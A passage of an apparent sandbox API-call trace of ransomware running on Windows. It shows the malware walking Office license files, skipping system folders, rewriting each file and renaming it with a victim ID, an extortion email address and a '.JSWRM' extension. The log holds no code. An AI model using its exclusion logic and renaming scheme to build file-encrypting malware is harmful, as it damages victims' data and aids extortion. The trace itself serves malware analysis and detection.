dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest4-pl.xrm-ms", cAlternateFileName="O3D05A~1.XRM")) returned 1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2=".") returned 1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2="..") returned 1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2="...") returned 1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2="windows") returned -1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2="recovery") returned -1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.861] lstrcmpiW (lpString1="O365HomePremR_SubTest4-pl.xrm-ms", lpString2="msocache") returned 1 [0104.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0104.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0104.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0104.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0104.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0104.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0104.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.862] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0104.862] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.862] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.864] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.864] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.864] CloseHandle (hObject=0x45c) returned 1 [0104.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0104.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0104.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0104.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0104.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0104.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0104.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0104.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0104.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.866] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5df6968, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5df6968, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5fe6802, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest4-ppd.xrm-ms", cAlternateFileName="O34B59~1.XRM")) returned 1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2=".") returned 1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2="..") returned 1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2="...") returned 1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2="windows") returned -1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.866] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0104.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0104.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0104.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0104.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0104.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.867] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23134) returned 1 [0104.867] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0104.867] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0104.875] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.875] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0104.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.876] CloseHandle (hObject=0x45c) returned 1 [0104.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0104.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0104.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0104.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0104.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0104.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0104.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.876] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0104.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0104.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0104.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.877] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dd0763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5dd0763, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6058f9b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest4-ul-oob.xrm-ms", cAlternateFileName="O3E65D~1.XRM")) returned 1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.877] lstrcmpiW (lpString1="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0104.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0104.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0104.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest4-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0104.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0104.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0104.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0104.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.878] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0104.878] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.879] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.881] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.881] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.881] CloseHandle (hObject=0x45c) returned 1 [0104.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0104.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0104.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0104.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0104.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0104.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.881] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 